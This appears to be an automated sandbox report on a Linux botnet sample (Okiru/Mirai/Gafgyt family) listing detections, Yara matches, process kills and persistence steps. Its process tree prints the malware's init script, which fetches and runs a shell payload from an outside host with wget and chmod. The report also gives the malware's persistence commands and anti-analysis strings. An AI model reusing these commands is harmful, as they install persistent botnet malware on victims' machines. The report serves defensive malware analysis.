Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
x86_64.nn.elf

Overview

General Information

Sample name:x86_64.nn.elf
Analysis ID:1520518
MD5:a43c7b0fb823947daaebc84fc7f18d51
SHA1:c95a119ea56a0c2b107c7ef47e852ee74e8ac891
SHA256:0671ab8eb145cea8e6b613b958a817e12d512a24ea1b5a3a2091a3b556c2a900
Tags:elfGorillauser-abuse_ch
Infos:

Detection

Okiru
Score:92
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Okiru
Drops files in suspicious directories
Sample tries to kill multiple processes (SIGKILL)
Sample tries to persist itself using /etc/profile
Sample tries to persist itself using System V runlevels
Sample tries to set files in /etc globally writable
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "mkdir" command used to create folders
Executes the "systemctl" command used for controlling the systemd system and service manager
Found strings indicative of a multi-platform dropper
Sample contains only a LOAD segment without any section mappings
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Sample tries to set the executable flag
Sleeps for long times indicative of sandbox evasion
Writes shell script file to disk with an unusual file extension
Yara signature match

Classification

General Information

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1520518
Start date and time:2024-09-27 12:53:12 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 13s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:x86_64.nn.elf
Detection:MAL
Classification:mal92.spre.troj.evad.linELF@0/9@0/0

Warnings

  • Skipping network analysis since amount of network traffic is too extensive
  • VT rate limit hit for: x86_64.nn.elf

Runtime Messages

Command:/tmp/x86_64.nn.elf
PID:6211
Exit Code:139
Exit Code Info:SIGSEGV (11) Segmentation fault invalid memory reference
Killed:False
Standard Output:

Standard Error:

Process Tree

  • system is lnxubuntu20
  • x86_64.nn.elf (PID: 6211, Parent: 6128, MD5: a43c7b0fb823947daaebc84fc7f18d51) Arguments: /tmp/x86_64.nn.elf
    • sh (PID: 6213, Parent: 6211, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable custom.service >/dev/null 2>&1"
      • sh New Fork (PID: 6214, Parent: 6213)
      • systemctl (PID: 6214, Parent: 6213, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable custom.service
    • sh (PID: 6233, Parent: 6211, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/mybinary >/dev/null 2>&1"
      • sh New Fork (PID: 6234, Parent: 6233)
      • chmod (PID: 6234, Parent: 6233, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/mybinary
    • sh (PID: 6239, Parent: 6211, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1"
      • sh New Fork (PID: 6240, Parent: 6239)
      • ln (PID: 6240, Parent: 6239, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary
    • sh (PID: 6241, Parent: 6211, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"#!/bin/sh\n# /etc/init.d/x86_64.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting x86_64.nn.elf'\n /tmp/x86_64.nn.elf &\n wget http://pen.gorillafirewall.su/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping x86_64.nn.elf'\n killall x86_64.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/x86_64.nn.elf"
    • sh (PID: 6242, Parent: 6211, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/x86_64.nn.elf >/dev/null 2>&1"
      • sh New Fork (PID: 6243, Parent: 6242)
      • chmod (PID: 6243, Parent: 6242, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/x86_64.nn.elf
    • sh (PID: 6244, Parent: 6211, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
      • sh New Fork (PID: 6245, Parent: 6244)
      • mkdir (PID: 6245, Parent: 6244, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir -p /etc/rc.d
    • sh (PID: 6246, Parent: 6211, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/x86_64.nn.elf /etc/rc.d/S99x86_64.nn.elf >/dev/null 2>&1"
      • sh New Fork (PID: 6247, Parent: 6246)
      • ln (PID: 6247, Parent: 6246, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/x86_64.nn.elf /etc/rc.d/S99x86_64.nn.elf
  • sh (PID: 6215, Parent: 1477, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
  • gsd-housekeeping (PID: 6215, Parent: 1477, MD5: b55f3394a84976ddb92a2915e5d76914) Arguments: /usr/libexec/gsd-housekeeping
  • systemd New Fork (PID: 6221, Parent: 6220)
  • snapd-env-generator (PID: 6221, Parent: 6220, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • cleanup

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
x86_64.nn.elfJoeSecurity_OkiruYara detected OkiruJoe Security
    x86_64.nn.elfLinux_Trojan_Gafgyt_9e9530a7unknownunknown
    • 0xb9b4:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
    x86_64.nn.elfLinux_Trojan_Gafgyt_807911a2unknownunknown
    • 0xc1a3:$a: FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D
    x86_64.nn.elfLinux_Trojan_Gafgyt_d4227dbfunknownunknown
    • 0x884e:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
    • 0x8a8c:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
    x86_64.nn.elfLinux_Trojan_Gafgyt_d996d335unknownunknown
    • 0xf026:$a: D0 EB 0F 40 38 37 75 04 48 89 F8 C3 49 FF C8 48 FF C7 4D 85 C0
    Click to see the 5 entries

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    6211.1.0000000000400000.0000000000413000.r-x.sdmpJoeSecurity_OkiruYara detected OkiruJoe Security
      6211.1.0000000000400000.0000000000413000.r-x.sdmpLinux_Trojan_Gafgyt_9e9530a7unknownunknown
      • 0xb9b4:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
      6211.1.0000000000400000.0000000000413000.r-x.sdmpLinux_Trojan_Gafgyt_807911a2unknownunknown
      • 0xc1a3:$a: FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D
      6211.1.0000000000400000.0000000000413000.r-x.sdmpLinux_Trojan_Gafgyt_d4227dbfunknownunknown
      • 0x884e:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
      • 0x8a8c:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
      6211.1.0000000000400000.0000000000413000.r-x.sdmpLinux_Trojan_Gafgyt_d996d335unknownunknown
      • 0xf026:$a: D0 EB 0F 40 38 37 75 04 48 89 F8 C3 49 FF C8 48 FF C7 4D 85 C0
      Click to see the 116 entries

      Suricata Signatures

      No Suricata rule has matched

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus / Scanner detection for submitted sample
      Source: x86_64.nn.elfAvira: detected
      Multi AV Scanner detection for submitted file
      Source: x86_64.nn.elfReversingLabs: Detection: 36%
      Source: x86_64.nn.elfString: Found And Killed Process: PID=%d, Realpath=%s/snap/snapd/15534/usr/lib/snapd/snapd/usr/libexec/openssh/sftp-serveranko-app/ankosample _8182T_11047815351681972surf2/proc/self/exe/proc/%s/exe/.(deleted)socket/tmp/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/opt/app/monitor/z/secom//usr/lib/mnt/sys/boot/media/srv/sbin/etc/dev/telnetbashhttpdtelnetddropbearencodersystem/var/tmp/wlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nn/initvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdvar/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincissh/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/wgetcurlping/pswiresharktcpdumpnetstatpythoniptablesnanonvimgdbpkillkillallapt487154914:1553<41<515791446<614561;814994;8153;148;14<5which gdb > /dev/null 2>&1which lldb > /dev/null 2>&1which dtrace > /dev/null 2>&1which truss > /dev/null 2>&1which ptrace > /dev/null 2>&1LD_PRELOADLD_LIBRARY_PATHLD_AUDIT/procw/etc/motd%s
      Source: /tmp/x86_64.nn.elf (PID: 6211)Socket: 0.0.0.0:38241Jump to behavior
      Source: x86_64.nn.elf, 6352.1.00007ffd4fb07000.00007ffd4fb28000.rw-.sdmp, profile.12.dr, inittab.12.dr, x86_64.nn.elf.34.dr, bootcmd.12.dr, mybinary.12.dr, custom.service.12.drString found in binary or memory: http://pen.gorillafirewall.su/
      Source: x86_64.nn.elf, 6211.1.00007ffd4fb07000.00007ffd4fb28000.rw-.sdmpString found in binary or memory: http://pen.gorillafirewall.su/lol.sh

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: x86_64.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
      Source: x86_64.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
      Source: x86_64.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
      Source: x86_64.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
      Source: x86_64.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
      Source: x86_64.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
      Source: x86_64.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_520deeb8 Author: unknown
      Source: x86_64.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_01e4a728 Author: unknown
      Source: x86_64.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
      Source: 6211.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
      Source: 6211.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
      Source: 6211.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
      Source: 6211.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
      Source: 6211.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
      Source: 6211.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
      Source: 6211.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 Author: unknown
      Source: 6211.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 Author: unknown
      Source: 6211.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
      Source: 6290.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
      Source: 6290.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
      Source: 6290.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
      Source: 6290.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
      Source: 6290.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
      Source: 6290.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
      Source: 6290.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 Author: unknown
      Source: 6290.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 Author: unknown
      Source: 6290.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
      Source: 6289.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
      Source: 6289.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
      Source: 6289.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
      Source: 6289.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
      Source: 6289.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
      Source: 6289.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
      Source: 6289.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 Author: unknown
      Source: 6289.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 Author: unknown
      Source: 6289.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
      Source: 6352.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
      Source: 6352.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
      Source: 6352.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
      Source: 6352.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
      Source: 6352.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
      Source: 6352.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
      Source: 6352.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 Author: unknown
      Source: 6352.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 Author: unknown
      Source: 6352.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
      Source: 6310.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
      Source: 6310.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
      Source: 6310.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
      Source: 6310.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
      Source: 6310.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
      Source: 6310.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
      Source: 6310.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 Author: unknown
      Source: 6310.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 Author: unknown
      Source: 6310.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
      Source: 6351.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
      Source: 6351.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
      Source: 6351.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
      Source: 6351.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
      Source: 6351.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
      Source: 6351.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
      Source: 6351.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 Author: unknown
      Source: 6351.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 Author: unknown
      Source: 6351.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
      Source: 6311.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
      Source: 6311.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
      Source: 6311.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
      Source: 6311.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
      Source: 6311.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
      Source: 6311.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
      Source: 6311.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 Author: unknown
      Source: 6311.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 Author: unknown
      Source: 6311.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
      Source: 6292.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
      Source: 6292.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
      Source: 6292.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
      Source: 6292.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
      Source: 6292.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
      Source: 6292.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
      Source: 6292.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 Author: unknown
      Source: 6292.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 Author: unknown
      Source: 6292.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
      Source: 6291.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
      Source: 6291.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
      Source: 6291.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
      Source: 6291.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
      Source: 6291.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
      Source: 6291.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
      Source: 6291.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 Author: unknown
      Source: 6291.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 Author: unknown
      Source: 6291.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
      Source: 6346.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
      Source: 6346.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
      Source: 6346.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
      Source: 6346.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
      Source: 6346.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
      Source: 6346.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
      Source: 6346.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 Author: unknown
      Source: 6346.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 Author: unknown
      Source: 6346.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
      Source: 6347.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
      Source: 6347.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
      Source: 6347.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
      Source: 6347.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
      Source: 6347.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
      Source: 6347.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
      Source: 6347.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 Author: unknown
      Source: 6347.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 Author: unknown
      Source: 6347.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
      Sample tries to kill multiple processes (SIGKILL)
      Source: /tmp/x86_64.nn.elf (PID: 6212)SIGKILL sent: pid: 788, result: successfulJump to behavior
      Source: /tmp/x86_64.nn.elf (PID: 6212)SIGKILL sent: pid: 884, result: successfulJump to behavior
      Source: /tmp/x86_64.nn.elf (PID: 6212)SIGKILL sent: pid: 1664, result: successfulJump to behavior
      Source: /tmp/x86_64.nn.elf (PID: 6212)SIGKILL sent: pid: 2096, result: successfulJump to behavior
      Source: /tmp/x86_64.nn.elf (PID: 6212)SIGKILL sent: pid: 2102, result: successfulJump to behavior
      Source: /tmp/x86_64.nn.elf (PID: 6212)SIGKILL sent: pid: 6215, result: successfulJump to behavior
      Source: /tmp/x86_64.nn.elf (PID: 6212)SIGKILL sent: pid: 6223, result: successfulJump to behavior
      Source: /tmp/x86_64.nn.elf (PID: 6212)SIGKILL sent: pid: 6250, result: successfulJump to behavior
      Source: /tmp/x86_64.nn.elf (PID: 6290)SIGKILL sent: pid: 6289, result: successfulJump to behavior
      Source: /tmp/x86_64.nn.elf (PID: 6292)SIGKILL sent: pid: 6291, result: successfulJump to behavior
      Source: /tmp/x86_64.nn.elf (PID: 6311)SIGKILL sent: pid: 1860, result: successfulJump to behavior
      Source: /tmp/x86_64.nn.elf (PID: 6347)SIGKILL sent: pid: 6346, result: successfulJump to behavior
      Source: /tmp/x86_64.nn.elf (PID: 6352)SIGKILL sent: pid: 6351, result: successfulJump to behavior
      Source: LOAD without section mappingsProgram segment: 0x400000
      Source: Initial sampleString containing 'busybox' found: /bin/busybox
      Source: Initial sampleString containing 'busybox' found: Found And Killed Process: PID=%d, Realpath=%s/snap/snapd/15534/usr/lib/snapd/snapd/usr/libexec/openssh/sftp-serveranko-app/ankosample _8182T_11047815351681972surf2/proc/self/exe/proc/%s/exe/.(deleted)socket/tmp/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/opt/app/monitor/z/secom//usr/lib/mnt/sys/boot/media/srv/sbin/etc/dev/telnetbashhttpdtelnetddropbearencodersystem/var/tmp/wlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nn/initvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdvar/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincissh/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/wgetcurlping/pswiresharktcpdumpnetstatpythoniptablesnanonvimgdbpkillkillallapt487154914:1553<41<515791446<614561;814994;8153;148;14<5which gdb > /dev/nu
      Source: /tmp/x86_64.nn.elf (PID: 6212)SIGKILL sent: pid: 788, result: successfulJump to behavior
      Source: /tmp/x86_64.nn.elf (PID: 6212)SIGKILL sent: pid: 884, result: successfulJump to behavior
      Source: /tmp/x86_64.nn.elf (PID: 6212)SIGKILL sent: pid: 1664, result: successfulJump to behavior
      Source: /tmp/x86_64.nn.elf (PID: 6212)SIGKILL sent: pid: 2096, result: successfulJump to behavior
